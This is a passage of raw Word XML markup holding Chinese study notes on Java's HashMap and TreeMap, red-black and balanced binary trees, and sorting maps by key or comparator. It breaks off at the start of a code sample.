          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidR="0008363A" w:rsidRPr="00590C1E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidR="0008363A" w:rsidRPr="00590C1E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>hashcode</w:t>
      </w:r>
      <w:r w:rsidR="0008363A" w:rsidRPr="00590C1E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>对其内容进行快速查找，而</w:t>
      </w:r>
      <w:r w:rsidR="0008363A" w:rsidRPr="00590C1E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> TreeMap</w:t>
      </w:r>
      <w:r w:rsidR="0008363A" w:rsidRPr="00590C1E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中所有的元素都保持着某种固定的顺序，如果你需要得到一个有序的结果你就应该使用</w:t>
      </w:r>
      <w:r w:rsidR="0008363A" w:rsidRPr="00590C1E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>TreeMap</w:t>
      </w:r>
      <w:r w:rsidR="0008363A" w:rsidRPr="00590C1E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="0008363A" w:rsidRPr="00590C1E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidR="0008363A" w:rsidRPr="00590C1E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中元素的排列顺序是不固定的）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00590C1E" w:rsidRDefault="00590C1E" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>TreeMap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>可以根据它的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>来进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的排序。然而，有时候我们需要根据它的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>来对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>进行排序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002663A9" w:rsidRPr="00590C1E" w:rsidRDefault="009702E1" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002663A9" w:rsidRPr="002663A9">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>http://www.programcreek.com/2013/03/java-sort-map-by-value/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D056ED" w:rsidRPr="00E20534" w:rsidRDefault="00590C1E" w:rsidP="00D056ED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="376" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D056ED" w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00D056ED" w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>红黑树又称红</w:t>
      </w:r>
      <w:r w:rsidR="00D056ED" w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00D056ED" w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>黑二叉树，它首先是一颗二叉树，它具体二叉树所有的特性。同时红黑树更是一颗自平衡的排序二叉树。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D056ED" w:rsidRPr="00E20534" w:rsidRDefault="00D056ED" w:rsidP="00D056ED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="376" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>我们知道一颗基本的二叉树他们都需要满足一个基本性质</w:t>
      </w:r>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>即树中的任何节点的值大于它的左子节点，且小于它的右子节点。按照这个基本性质使得树的检索效率大大提高。我们知道在生成二叉树的过程是非常容易失衡的，最坏的情况就是一边倒（只有右</w:t>
      </w:r>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>左子树），这样势必会导致二叉树的检索效率大大降低（</w:t>
      </w:r>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>O(n)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>），所以为了维持二叉树的平衡，大牛们提出了各种实现的算法，如：</w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00E20534">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:color w:val="000000"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>AVL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00E20534">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:color w:val="000000"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>SBT</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:hyperlink r:id="rId42" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00E20534">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:color w:val="000000"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>伸展树</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:hyperlink r:id="rId43" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00E20534">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:color w:val="000000"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>TREAP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:hyperlink r:id="rId44" w:anchor="1_1" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00E20534">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:color w:val="000000"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>红黑树</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>等等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D056ED" w:rsidRPr="000E2014" w:rsidRDefault="00D056ED" w:rsidP="000E2014">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="376" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>平衡二叉树必须具备如下特性：它是一棵空树或它的左右两个子树的高度差的绝对值不超过</w:t>
      </w:r>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，并且左右两个子树都是一棵平衡二叉树。也就是说该二叉树的任何一个等等子节点，其左右子树的高度都相近。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E7DED" w:rsidRDefault="00B063E7" w:rsidP="000E7DED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000E7DED">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="000E7DED">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="000E7DED">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>TreeMap</w:t>
      </w:r>
      <w:r w:rsidR="000E7DED" w:rsidRPr="00E579A7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>如不指定排序器，默认将按照</w:t>
      </w:r>
      <w:r w:rsidR="000E7DED" w:rsidRPr="00E579A7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidR="000E7DED" w:rsidRPr="00E579A7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>值进行升序排序，如果指定了排序器，则按照指定的排序器进行排序</w:t>
      </w:r>
      <w:r w:rsidR="000E7DED">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00590C1E" w:rsidRDefault="00B063E7" w:rsidP="000E7DED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000E7DED">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="000E7DED">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、具体的排序规则，开发人员可以在</w:t>
      </w:r>
      <w:r w:rsidR="000E7DED">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>int compare()</w:t>
      </w:r>
      <w:r w:rsidR="000E7DED">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方法中进行指定。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B920EF" w:rsidRDefault="00B920EF" w:rsidP="00B920EF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="313" w:lineRule="atLeast"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HashMap:适用于在Map中插入、删除和定位元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B920EF" w:rsidRDefault="00B920EF" w:rsidP="00B920EF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="313" w:lineRule="atLeast"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Treemap:适用于按自然顺序或自定义顺序遍历键（key）。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ab"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A53EDB" w:rsidTr="00A53EDB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>static</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
